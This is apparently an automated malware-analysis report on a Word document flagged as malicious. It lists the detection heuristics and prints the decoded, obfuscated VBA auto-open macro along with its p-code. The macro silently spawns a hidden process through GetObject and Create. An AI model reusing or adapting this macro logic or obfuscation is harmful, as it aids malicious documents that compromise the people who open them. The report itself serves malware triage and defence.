MALICIOUS
Risk Score: 190
Heuristics (7)
- ClamAV: Doc.Malware.Drsm-6900249-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Drsm-6900249-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set PADBxAU = GetObject(w_UDQ1.cZUA_c)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12874 bytes |

SHA-256: 897502dbcea3b43cb341f9f7b48c8b252dc19865dcfbb87a7ac83480719fcf9b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BBABBX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "w_UDQ1"
Attribute VB_Base = "0{B6818453-DAAC-4BBC-BDA5-49D98F13EA16}{D1EC85BF-9CF2-45B6-A965-150BBC52AF46}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ACAcDxA"
Sub autoopen()
On Error Resume Next
If qcQ1AAAA = rCwxAA Then
Kco_AwAA = 799178422 - fGUAZw
cxQAAAA = KBo_cZ_o + Oct(MBBDBDQ) / 919487372 * 412496744
Set mQZBAAA = KxD4_CAA
vQBoQA = (696895835 + 918586421 * bDAGA_D + CInt(383683400) + iBBDAw / joAQ1A)
IAcGkxCQ = 295588792
End If
If iACUUZU_ = KUUQU_ Then
rBwDUDAC = 706068284 - tQQwZBQ
QAwDAAQA = swAAXGQ1 + Oct(CQQAkDA) / 442888845 * 485499528
Set fUU_UAo4 = lAADDAA
wQw_oQA = (458232951 + 252499879 * RAocAAAB + CInt(772428375) + jkcA4cGx / sCAUUCBC)
jc4AAA = 830226674
End If
If E11DAA_A = wGUCDA Then
FBZDCxAx = 549335766 - dBxAZoA
bwAAQoc = iAA4_x + Oct(kAAAAD) / 489975870 * 137383594
Set uAwD_1D = CA4AAAAo
zDx11A1Z = (525704382 + 192121145 * wQQAAc + CInt(586070133) + aXkxQk1 / b__wAc)
wAAQBD = 43805403
End If
Set PADBxAU = GetObject(w_UDQ1.cZUA_c)
If RkUcZokA = WxA4AA4 Then
cDAAXAA = 241479733 - BXo4QwAA
lQUxAU1A = zUAoUAA + Oct(wAAwDU1) / 534468489 * 397176251
Set WBAZCxG = pAcxDC
AXAcBQA = (903973013 + 76979736 * PABAUo + CInt(60958860) + HCUAw1 / DAoAUA)
AU4AB4 = 859776799
End If
If iAAwA4QZ = wZBAUDA Then
WwAo_GA = 732012163 - BAoAAA
WDUGADA_ = RUGcXA + Oct(mCXQDBBw) / 588725801 * 580093628
Set oGA1AG = ZBwcAcUQ
l_AAx1 = (601520708 + 888222086 * sQQAUG1G + CInt(219551468) + aBAAXA / F_1AQB4B)
tGxUxoc = 765088581
End If
If r44AXA = kBxkBw Then
bDCoGU = 79480808 - TAAkAA
RGAAXAB = ZZA1A_AX + Oct(XUUkQUB) / 830935869 * 841049694
Set uxAUAQ = RDkXCw4_
SGCAAwxC = (549902528 + 93617319 * Xc1G4_k + CInt(602200872) + EAAADwAA / sA_AkA)
j1cBZx = 655545730
End If
PADBxAU.ShowWindow = 798855 - 798855
If iDDACCA = z_1AoU Then
PcAAC_ = 778506356 - UUwo_AA
IkAkAxA = OAkoU1x + Oct(oAAoBA) / 553425857 * 580232699
Set RQACk_Ao = J4x4oZ
axCBAQ = (555012393 + 957415488 * cwBwQo + CInt(14371698) + KxAkUAC / qAxDB1)
p_wkUA = 669722717
End If
If d1AAxAAD = QA_AcAA Then
F111kA = 835318987 - qQAAAwAD
kADBAB = p1o_c4G + Oct(NxGxXCk) / 536002814 * 162103150
Set QwBAACA = WAUAUx
SAXAAA = (50970156 + 64269164 * b_cAcC + CInt(212893555) + XCQxoAA / OAAAAA)
WAQ4QBw = 879371395
End If
If T_AQAA = jZAAAAx Then
UAAAUAD = 561312835 - PZAcZAQ
TZDZ_oAD = EAZQDC + Oct(qAUUcc_) / 682582591 * 54076216
Set sAQAxCx = XBDGAZxU
cxCAUo4A = (512492541 + 116418414 * qAoAA1A_ + CInt(829278997) + roABUD_ / tDA_oZ)
W1ZXGGA_ = 822461061
End If
GetObject(w_UDQ1.ukUQAAQ).Create% GAQwA_ + w_UDQ1.m1AQBUA + qQAAXZ + w_UDQ1.cX4cAk + VQD1CAAZ + w_UDQ1.IAQUZDkZ + wGkAAGA4, ZxoGACD4, PADBxAU, SDBDBkBD
If AQcBcA1C = wAcwoAA Then
RDAoAAUX = 266925652 - wQoAXxA
HZAAAxAD = i1UoQBC + Oct(q4kAoc) / 571205524 * 207097382
Set BoAA4Q = uDAoA1A
aokAwD = (3423715 + 57346181 * XCAwAB + CInt(157771230) + iBAAAxD / wBBwDo)
YCAQAU = 556314720
End If
If DDAxAG = iAADBZ Then
qAxDZAA = 203887486 - sUAZA1ZX
TUADAUx = YABxAoBA + Oct(MACcAAAU) / 162394649 * 904007924
Set h1AAAAC = pADBCx
f4B4AA = (776999636 + 411187819 * OccBXx + CInt(903146513) + jD_CADG / fUAADA)
OCwDQB = 993012233
End If
If FXZAAA4 = ABABAAQD Then
aAxAAoB4 = 283731435 - BAUUAB
NAB1xB = ZAXDUQZ4 + Oct(OAx4AA) / 941355638 * 700314968
Set EBABBAAA = BDGwDo
cA1DADB = (504600521 + 248509088 * OD1B44 + CInt(627515352) + poD4G1A / qAowUAU_)
OcDBABG = 654975529
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/3879db94c05a4d59b8cbcce229036a45.bin
' ===============================================================================
' Module streams:
' Macros/VBA/BBABBX - 1104 bytes
' Macros/VBA/w_UDQ1 - 1156 bytes
' Macros/VBA/ACAcDxA - 6496 bytes
' Line #0:
' FuncDefn (Sub ACAcDxA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld qcQ1AAAA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x7EB6 0x2FA2
' Ld Kco_AwAA
' Sub
' St rCwxAA
' Line #4:
' Ld cxQAAAA
' Ld KBo_cZ_o
' ArgsLd Oct 0x0001
' LitDI4 0x438C 0x36CE
' Div
' LitDI4 0x3368 0x1896
' Mul
' Add
' St fGUAZw
' Line #5:
' SetStmt
' Ld mQZBAAA
' Set MBBDBDQ
' Line #6:
' LitDI4 0xC95B 0x2989
' LitDI4 0x8435 0x36C0
' Ld vQBoQA
' Mul
' Add
' LitDI4 0x8B48 0x16DE
' Coerce (Int)
' Add
' Ld bDAGA_D
' Ld iBBDAw
' Div
' Add
' Paren
' St KxD4_CAA
' Line #7:
' LitDI4 0x53B8 0x119E
' St joAQ1A
' Line #8:
' EndIfBlock
' Line #9:
' Ld IAcGkxCQ
' Ld iACUUZU_
' Eq
' IfBlock
' Line #10:
' LitDI4 0xBF3C 0x2A15
' Ld rBwDUDAC
' Sub
' St KUUQU_
' Line #11:
' Ld QAwDAAQA
' Ld swAAXGQ1
' ArgsLd Oct 0x0001
' LitDI4 0xF28D 0x1A65
' Div
' LitDI4 0x2288 0x1CF0
' Mul
' Add
' St tQQwZBQ
' Line #12:
' SetStmt
' Ld fUU_UAo4
' Set CQQAkDA
' Line #13:
' LitDI4 0x1477 0x1B50
' LitDI4 0xD7A7 0x0F0C
' Ld wQw_oQA
' Mul
' Add
' LitDI4 0x5257 0x2E0A
' Coerce (Int)
' Add
' Ld RAocAAAB
' Ld jkcA4cGx
' Div
' Add
' Paren
' St lAADDAA
' Line #14:
' LitDI4 0x40F2 0x317C
' St sCAUUCBC
' Line #15:
' EndIfBlock
' Line #16:
' Ld jc4AAA
' Ld E11DAA_A
' Eq
' IfBlock
' Line #17:
' LitDI4 0x32D6 0x20BE
' Ld FBZDCxAx
' Sub
' St wGUCDA
' Line #18:
' Ld bwAAQoc
' Ld iAA4_x
' ArgsLd Oct 0x0001
' LitDI4 0x703E 0x1D34
' Div
' LitDI4 0x4EAA 0x0830
' Mul
' Add
' St dBxAZoA
' Line #19:
' SetStmt
' Ld uAwD_1D
' Set kAAAAD
' Line #20:
' LitDI4 0x9CBE 0x1F55
' LitDI4 0x8939 0x0B73
' Ld zDx11A1Z
' Mul
' Add
' LitDI4 0xB875 0x22EE
' Coerce (Int)
' Add
' Ld wQQAAc
' Ld aXkxQk1
' Div
' Add
' Paren
' St CA4AAAAo
' Line #21:
' LitDI4 0x6ADB 0x029C
' St b__wAc
' Line #22:
' EndIfBlock
' Line #23:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd PADBxAU 0x0001
' Set wAAQBD
' Line #24:
' Ld cZUA_c
' Ld RkUcZokA
' Eq
' IfBlock
' Line #25:
' LitDI4 0xB035 0x0E64
' Ld cDAAXAA
' Sub
' St WxA4AA4
' Line #26:
' Ld lQUxAU1A
' Ld zUAoUAA
' ArgsLd Oct 0x0001
' LitDI4 0x5789 0x1FDB
' Div
' LitDI4 0x6DBB 0x17AC
' Mul
' Add
' St BXo4QwAA
' Line #27:
' SetStmt
' Ld WBAZCxG
' Set wAAwDU1
' Line #28:
' LitDI4 0x8895 0x35E1
' LitDI4 0x9E18 0x0496
' Ld AXAcBQA
' Mul
' Add
' LitDI4 0x288C 0x03A2
' Coerce (Int)
' Add
' Ld PABAUo
' Ld HCUAw1
' Div
' Add
' Paren
' St pAcxDC
' Line #29:
' LitDI4 0x271F 0x333F
' St DAoAUA
' Line #30:
' EndIfBlock
' Line #31:
' Ld AU4AB4
' Ld iAAwA4QZ
' Eq
' IfBlock
' Line #32:
' LitDI4 0x9E83 0x2BA1
' Ld WwAo_GA
' Sub
' St wZBAUDA
' Line #33:
' Ld WDUGADA_
' Ld RUGcXA
' ArgsLd Oct 0x0001
' LitDI4 0x3E29 0x2317
' Div
' LitDI4 0x86BC 0x2293
' Mul
' Add
' St BAoAAA
' Line #34:
' SetStmt
' Ld oGA1AG
' Set mCXQDBBw
' Line #35:
' LitDI4 0x7A44 0x23DA
' LitDI4 0x3186 0x34F1
' Ld l_AAx1
' Mul
' Add
' LitDI4 0x16EC 0x0D16
' Coerce (Int)
' Add
' Ld sQQAUG1G
' Ld aBAAXA
' Div
' Add
' Paren
' St ZBwcAcUQ
' Line #36:
' LitDI4 0x5345 0x2D9A
' St F_1AQB4B
' Line #37:
' EndIfBlock
' Line #38:
' Ld tGxUxoc
' Ld r44AXA
' Eq
' IfBlock
' Line #39:
' LitDI4 0xC7E8 0x04BC
' Ld bDCoGU
' Sub
' St kBxkBw
' Line #40:
' Ld RGAAXAB
' Ld ZZA1A_AX
' ArgsLd Oct 0x0001
' LitDI4 0x133D 0x3187
' Div
' LitDI4 0x665E 0x3221
' Mul
' Add
' St TAAkAA
' Line #41:
' SetStmt
' Ld uxAUAQ
' Set XUUkQUB
' Line #42:
' LitDI4 0xD8C0 0x20C6
' LitDI4 0x7CA7 0x0594
' Ld SGCAAwxC
' Mul
' Add
' LitDI4 0xDB28 0x23E4
' Coerce (Int)
' Add
' Ld Xc1G4_k
' Ld EAAADwAA
' Div
' Add
' Paren
' St RDkXCw4_
' Line #43:
' LitDI4 0xD582 0x2712
' St sA_AkA
' Line #44:
' EndIfBlock
' Line #45:
' LitDI4 0x3087 0x000C
' LitDI4 0x3087 0x000C
' Sub
' Ld wAAQBD
' MemSt j1cBZx
' Line #46:
' Ld ShowWindow
' Ld iDDACCA
' Eq
' IfBlock
' Line #47:
' LitDI4 0x1074 0x2E67
' Ld PcAAC_
' Sub
' St z_1AoU
' Line #48:
' Ld IkAkAxA
' Ld OAkoU1x
' ArgsLd Oct 0x0001
' LitDI4 0x9BC1 0x20FC
' Div
' LitDI4 0xA5FB 0x2295
' Mul
' Add
' St UUwo_AA
' Line #49:
' SetStmt
' Ld RQACk_Ao
' Set oAAoBA
' Line #50:
' LitDI4 0xD129 0x2114
' LitDI4 0x0040 0x3911
' Ld axCBAQ
' Mul
' Add
' LitDI4 0x4B72 0x00DB
' Coerce (Int)
' Add
' Ld cwBwQo
' Ld KxAkUAC
' Div
' Add
' Paren
' St J4x4oZ
' Line #51:
' LitDI4 0x285D 0x27EB
' St qAxDB1
' Line #52:
' EndIfBlock
' Line #53:
' Ld p_wkUA
' Ld d1AAxAAD
' Eq
' IfBlock
' Line #54:
' LitDI4 0xF4CB 0x31C9
' Ld F111kA
' Sub
' St QA_AcAA
' Line #55:
' Ld kADBAB
' Ld p1o_c4G
' ArgsLd Oct 0x0001
' LitDI4 0xC0FE 0x1FF2
' Div
' LitDI4 0x7F6E 0x09A9
' Mul
' Add
' St qQAAAwAD
' Line #56:
' SetStmt
' Ld QwBAACA
' Set NxGxXCk
' Line #57:
' LitDI4 0xBE2C 0x0309
' LitDI4 0xAB6C 0x03D4
' Ld SAXAAA
' Mul
' Add
' LitDI4 0x7F73 0x0CB0
' Coerce (Int)
' Add
' Ld b_cAcC
' Ld XCQxoAA
' Div
' Add
' Paren
' St WAUAUx
' Line #58:
' LitDI4 0x2483 0x346A
' St OAAAAA
' Line #59:
' EndIfBlock
' Line #60:
' Ld WAQ4QBw
' Ld T_AQAA
' Eq
' IfBlock
' Line #61:
' LitDI4 0xF443 0x2174
' Ld UAAAUAD
' Sub
' St jZAAAAx
' Line #62:
' Ld TZDZ_oAD
' Ld EAZQDC
' ArgsLd Oct 0x0001
' LitDI4 0x623F 0x28AF
' Div
' LitDI4 0x2338 0x0339
' Mul
' Add
' St PZAcZAQ
' Line #63:
' SetStmt
' Ld sAQAxCx
' Set qAUUcc_
' Line #64:
' LitDI4 0x03FD 0x1E8C
' LitDI4 0x676E 0x06F0
' Ld cxCAUo4A
' Mul
' Add
' LitDI4 0xCB15 0x316D
' Coerce (Int)
' Add
' Ld qAoAA1A_
' Ld roABUD_
' Div
' Add
' Paren
' St XBDGAZxU
' Line #65:
' LitDI4 0xC285 0x3105
' St tDA_oZ
' Line #66:
' EndIfBlock
' Line #67:
' Ld Create
' Ld MSForms
' MemLd GAQwA_
' Add
' Ld m1AQBUA
' Add
' Ld MSForms
' MemLd qQAAXZ
' Add
' Ld cX4cAk
' Add
' Ld MSForms
' MemLd VQD1CAAZ
' Add
' Ld IAQUZDkZ
' Add
' Ld wGkAAGA4
' Ld wAAQBD
' Ld ZxoGACD4
' Ld MSForms
' MemLd W1ZXGGA_
' ArgsLd PADBxAU 0x0001
' ArgsMemCall ukUQAAQ% 0x0004
' Line #68:
' Ld SDBDBkBD
' Ld AQcBcA1C
' Eq
' IfBlock
' Line #69:
' LitDI4 0xF654 0x0FE8
' Ld RDAoAAUX
' Sub
' St wAcwoAA
' Line #70:
' Ld HZAAAxAD
' Ld i1UoQBC
' ArgsLd Oct 0x0001
' LitDI4 0xE794 0x220B
' Div
' LitDI4 0x0E26 0x0C58
' Mul
' Add
' St wQoAXxA
' Line #71:
' SetStmt
' Ld BoAA4Q
' Set q4kAoc
' Line #72:
' LitDI4 0x3DE3 0x0034
' LitDI4 0x0885 0x036B
' Ld aokAwD
' Mul
' Add
' LitDI4 0x65DE 0x0967
' Coerce (Int)
' Add
' Ld XCAwAB
' Ld iBAAAxD
' Div
' Add
' Paren
' St uDAoA1A
' Line #73:
' LitDI4 0xB060 0x2128
' St wBBwDo
' Line #74:
' EndIfBlock
' Line #75:
' Ld YCAQAU
' Ld DDAxAG
' Eq
' IfBlock
' Line #76:
' LitDI4 0x137E 0x0C27
' Ld qAxDZAA
' Sub
' St iAADBZ
' Line #77:
' Ld TUADAUx
' Ld YABxAoBA
' ArgsLd Oct 0x0001
' LitDI4 0xF219 0x09AD
' Div
' LitDI4 0x10F4 0x35E2
' Mul
' Add
' St sUAZA1ZX
' Line #78:
' SetStmt
' Ld h1AAAAC
' Set MACcAAAU
' Line #79:
' LitDI4 0x12D4 0x2E50
' LitDI4 0x3A6B 0x1882
' Ld f4B4AA
' Mul
' Add
' LitDI4 0xEC11 0x35D4
' Coerce (Int)
' Add
' Ld OccBXx
' Ld jD_CADG
' Div
' Add
' Paren
' St pADBCx
' Line #80:
' LitDI4 0x2A09 0x3B30
' St fUAADA
' Line #81:
' EndIfBlock
' Line #82:
' Ld OCwDQB
' Ld FXZAAA4
' Eq
' IfBlock
' Line #83:
' LitDI4 0x65EB 0x10E9
' Ld aAxAAoB4
' Sub
' St ABABAAQD
' Line #84:
' Ld NAB1xB
' Ld ZAXDUQZ4
' ArgsLd Oct 0x0001
' LitDI4 0xF276 0x381B
' Div
' LitDI4 0xF558 0x29BD
' Mul
' Add
' St BAUUAB
' Line #85:
' SetStmt
' Ld EBABBAAA
' Set OAx4AA
' Line #86:
' LitDI4 0x97C9 0x1E13
' LitDI4 0xF2A0 0x0ECF
' Ld cA1DADB
' Mul
' Add
' LitDI4 0x1FD8 0x2567
' Coerce (Int)
' Add
' Ld OD1B44
' Ld poD4G1A
' Div
' Add
' Paren
' St BDGwDo
' Line #87:
' LitDI4 0x2229 0x270A
' St qAowUAU_
' Line #88:
' EndIfBlock
' Line #89:
' EndSub